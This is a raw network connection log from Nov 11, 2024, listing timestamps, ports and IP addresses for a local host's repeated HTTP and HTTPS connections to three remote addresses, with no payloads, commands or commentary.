                                                                                                                        Nov 11, 2024 15:28:08.063385010 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.064882994 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.064933062 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.064939022 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.064982891 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.066567898 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.066622972 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.066628933 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.066675901 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.068553925 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.068602085 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.068625927 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.068667889 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.070291996 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.070364952 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.070373058 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.070421934 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.073101997 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.073165894 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.073173046 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.073215961 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.073431015 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.073474884 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.073479891 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.073523045 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.075747967 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.075812101 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.075819016 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.075864077 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.077109098 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.077164888 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.077200890 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.077244043 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.078444958 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.078500032 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.078509092 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.078564882 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.080215931 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.080276012 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.080281019 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.080324888 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.080331087 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.080378056 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.081903934 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.081948996 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.081955910 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.081999063 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.083631992 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.083678007 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.083683014 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.083726883 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.085345984 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.085390091 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.085395098 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.085436106 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107356071 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107462883 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107476950 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107522964 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107536077 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107597113 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107647896 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107690096 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107695103 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107733965 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107738018 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107768059 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107795954 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107799053 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107805967 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.107829094 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.107856989 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108299017 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108342886 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108347893 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108391047 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108443022 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108490944 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108494997 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108530998 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108539104 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108549118 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108568907 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108603001 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.108608007 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.108653069 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109205961 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109247923 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109252930 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109292030 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109296083 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109338045 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109343052 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109384060 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109388113 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109426975 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109494925 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109538078 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109543085 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.109581947 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.109960079 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110002995 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110085964 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110126972 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110135078 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110174894 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110176086 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110183954 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110222101 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110227108 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110270977 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110275984 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110318899 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.110883951 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.110930920 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.111011982 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.111052990 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.113138914 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.113183022 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.113188028 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.113235950 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.113832951 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.113881111 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.113886118 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.113924026 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.115514994 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.115573883 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.115578890 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.115622997 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.116398096 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.116446018 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.116450071 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.116493940 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.118074894 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.118124008 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.118129015 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.118180037 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.119096041 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.119132996 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.119184017 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.119231939 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.120367050 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.120419025 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.120424986 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.120465994 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.121571064 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.121623039 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.121627092 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.121665001 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.122992992 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.123040915 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.123045921 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.123091936 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.124080896 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.124138117 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.124142885 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.124186993 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.125456095 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.125503063 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.125507116 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.125550032 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.125554085 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.125591993 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.127732038 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:08.127779007 CET44349984172.217.18.1192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:08.127847910 CET49984443192.168.2.6172.217.18.1
                                                                                                                        Nov 11, 2024 15:28:09.699124098 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:09.704104900 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:09.704195976 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:09.704408884 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:09.709209919 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:11.421066046 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:11.444967985 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:11.449779034 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:11.708616018 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:11.755826950 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:12.094021082 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.094058990 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.094139099 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.112204075 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.112224102 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.547013044 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.547154903 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.558048964 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.558087111 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.558368921 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.586503029 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.631329060 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.705518961 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.705595970 CET44349986188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:12.705689907 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.765791893 CET49986443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:12.791001081 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:12.795870066 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.031377077 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.036801100 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.036842108 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.036916018 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.037620068 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.037631989 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.083971024 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.465493917 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.477077961 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.477094889 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.593247890 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.593378067 CET44349987188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.593445063 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.594027042 CET49987443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:13.614604950 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.615849972 CET4998880192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.620742083 CET8049985132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.620815992 CET4998580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.621237040 CET8049988132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:13.621337891 CET4998880192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.621459007 CET4998880192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:13.626266003 CET8049988132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:14.998121023 CET8049988132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:14.999511957 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:14.999558926 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:14.999646902 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:14.999887943 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:14.999902010 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.052707911 CET4998880192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:15.428628922 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.443274975 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:15.443320036 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.548063040 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.548140049 CET44349989188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.548795938 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:15.549397945 CET49989443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:15.575628042 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:15.580631971 CET8049991132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:15.580769062 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:15.580898046 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:15.585676908 CET8049991132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:16.682430983 CET8049991132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:16.683974981 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:16.684015036 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:16.684089899 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:16.684397936 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:16.684411049 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:16.724571943 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.112672091 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.114628077 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:17.114654064 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.233289003 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.233360052 CET44349992188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.233427048 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:17.234051943 CET49992443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:17.254889965 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.256191015 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.260025024 CET8049991132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.260119915 CET4999180192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.261143923 CET8049993132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:17.261209011 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.261389971 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:17.266242027 CET8049993132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.012852907 CET8049993132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.014947891 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.014978886 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.015069962 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.015362978 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.015376091 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.068360090 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.442115068 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.444216013 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.444237947 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.553536892 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.553599119 CET44349994188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.553716898 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.554368019 CET49994443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:18.844350100 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.845133066 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.849711895 CET8049993132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.849847078 CET4999380192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.850131035 CET8049995132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:18.850213051 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.852266073 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:18.857110977 CET8049995132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:19.558464050 CET8049995132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:19.560043097 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:19.560086012 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:19.560180902 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:19.560451031 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:19.560470104 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:19.599634886 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:19.990353107 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:19.992264986 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:19.992290020 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.100488901 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.100552082 CET44349996188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.100627899 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:20.101305008 CET49996443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:20.122966051 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:20.124361992 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:20.128628016 CET8049995132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.128699064 CET4999580192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:20.129612923 CET8049997132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.129689932 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:20.129791975 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:20.134547949 CET8049997132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.849217892 CET8049997132.226.8.169192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.850785971 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:20.850842953 CET44349998188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.850929976 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:20.851222992 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:20.851237059 CET44349998188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:20.896455050 CET4999780192.168.2.6132.226.8.169
                                                                                                                        Nov 11, 2024 15:28:21.279979944 CET44349998188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:21.281824112 CET49998443192.168.2.6188.114.96.3
                                                                                                                        Nov 11, 2024 15:28:21.281851053 CET44349998188.114.96.3192.168.2.6
                                                                                                                        Nov 11, 2024 15:28:21.416348934 CET44349998188.114.96.3192.168.2.6
